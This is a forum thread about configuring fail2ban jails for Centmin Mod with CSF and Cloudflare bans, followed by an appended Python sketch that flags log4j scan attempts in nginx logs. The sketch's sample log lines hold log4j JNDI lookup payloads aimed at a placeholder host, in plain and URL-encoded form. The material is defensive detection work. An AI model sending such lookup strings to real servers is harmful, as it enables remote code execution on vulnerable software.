
Security fail2ban for Centmin Mod + CSF Firewall / Cloudflare API

Discussion in 'System Administration' started by eva2000, May 12, 2017.

  1. pamamolf

    pamamolf Premium Member Premium Member

    4,077
    427
    83
    May 31, 2014
    Ratings:
    +833
    Local Time:
    8:38 PM
    Nginx-1.25.x
    MariaDB 10.3.x
    Hi :)

    George please remove from:
    Code:
    [nginx-auth]
    the:
    as it is included and checked from:
    Code:
    [nginx-auth-main]
    Also this one is not duplicated:
    Code:
    [shells]
    enabled = true
    filter = shells
    action = csfdeny[name=shells]
    #action   = cloudflare
    logpath = /home/nginx/domains/*/log/access.log
              /var/log/nginx/*.access.log
    bantime = 604800
    maxretry = 1
    findtime = 86400
    Can you please duplicate it so we will have the logs separated?


    Thank you !
     
  2. eva2000

    eva2000 Administrator Staff Member

    54,352
    12,198
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +18,763
    Local Time:
    4:38 AM
    Nginx 1.27.x
    MariaDB 10.x/11.4+
    fixed :D
     
  3. pamamolf

    I just updated it but [shells] is not duplicated :(

    It seems you forgot one fix :)
     
    Last edited: Sep 11, 2017
  4. pamamolf

    I will wait for that edit to do a proper test from start :)
     
  5. eva2000

    done :D
     
  6. pamamolf

    Now all are working great for me when I test it from scratch :)

    Don't know if it is possible to get at the Cloudflare ban as a comment the same as csf comment...

    For example Fail2ban and the jail name, so we will know why the IP was banned (from the Cloudflare panel) without going to the server and grepping the IP or checking it using the fail2ban status option.... ?
     
  7. eva2000

    I tried and couldn't get comments added but will look into it
     
  8. pamamolf

    Isn't the latest addition for adminer detection ready to use?

    As I can see on GitHub you commented it as preparation for it....
     
  9. eva2000

    yeah ain't ready yet, need to research for better fail2ban regex matching for adminer scan entries in logs
     
  10. Tinkerd10

    Tinkerd10 Member

    30
    3
    8
    Sep 28, 2016
    Ratings:
    +15
    Local Time:
    7:38 PM
    1.25.1
    10.11
    Hi

    I tested this last month on CentOS 7 and it worked perfectly, it was like magic lol, and I was hoping there is a version for CentOS 6, as I am swarmed with bots to the point where I can't even use my own website.

    thank you
     
  11. eva2000

    Thanks for the feedback. CentOS 7 for now until it's perfected :D
     
  12. GamerJota

    GamerJota Member

    49
    7
    8
    Mar 1, 2016
    Ratings:
    +18
    Local Time:
    3:38 PM
    Anyone got a good example for XenForo 2 forum login and admin panel login limit?
     
    Last edited: Mar 11, 2018
  13. eva2000

  14. GamerJota

    Oh my, just got confused out.

    Okay, sorted out the fail2ban and it's working, thank you.

    What about the virtual host "location" to catch the forums' login and register and also the login in the admin panel to add a limit_req_zone? Can't figure it out by myself. o_O
     
  15. eva2000

    That isn't part of the fail2ban setup, so start a new thread in the subforum at Forum software usage.
     
  16. eva2000

  17. eva2000

    For folks testing my Centmin Mod fail2ban implementation, I've updated it to detect log4j vulnerability scans for Centmin Mod Nginx log inspection. Details are at Update to support log4j vulnerability scans · Issue #2 · centminmod/centminmod-fail2ban. You can see an example of fail2ban detecting log4j vulnerability scans on a Centmin Mod Nginx server with my fail2ban implementation installed at GitHub - centminmod/centminmod-fail2ban: fail2ban setup for centminmod.com LEMP stack with CSF Firewall. FYI, while doing testing, it actually caught a real vulnerability scan too!

    There is no support for Centmin Mod fail2ban implementation, so you'd generally be on your own to configure and troubleshoot for your needs.
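
Added example (not part of the thread and not the centminmod-fail2ban filter): a minimal Python sketch of the kind of access-log matching a log4j scan jail performs, including the percent-encoded form that a literal match would miss. The function names, both regexes, the assumed "combined" log format and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: standard nginx "combined" access log layout; adjust for a custom log_format.
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Illustrative pattern only; a production failregex needs broader coverage.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalise(field):
    """Undo up to two rounds of percent-encoding so %24%7Bjndi%3A reads as ${jndi:."""
    for _ in range(2):
        decoded = unquote(field)
        if decoded == field:
            break
        field = decoded
    return field


def scan_hosts(lines):
    """Return {client_ip: hits} for lines whose request line, referer or
    user-agent carries a JNDI lookup string after normalisation."""
    hits = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line; nothing to attribute to a host
        fields = (m["request"], m["referer"], m["agent"])
        if any(JNDI_RE.search(normalise(f)) for f in fields):
            hits[m["host"]] = hits.get(m["host"], 0) + 1
    return hits


# Constructed sample lines (documentation IP ranges, non-resolvable placeholder host).
SAMPLE = [
    '198.51.100.7 - - [12/Dec/2021:04:38:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://scanner.invalid/a}"',
    '203.0.113.9 - - [12/Dec/2021:04:38:05 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.invalid%2Fa%7D HTTP/1.1" 404 162 "-" "curl/7.79.1"',
    '192.0.2.44 - - [12/Dec/2021:04:38:09 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, count in scan_hosts(SAMPLE).items():
        print(f"{ip}: {count} matching request(s)")
```

fail2ban itself matches raw log lines with a failregex and does not percent-decode them, so a real filter has to list the encoded spellings explicitly; the decode step here only shows why both forms need covering.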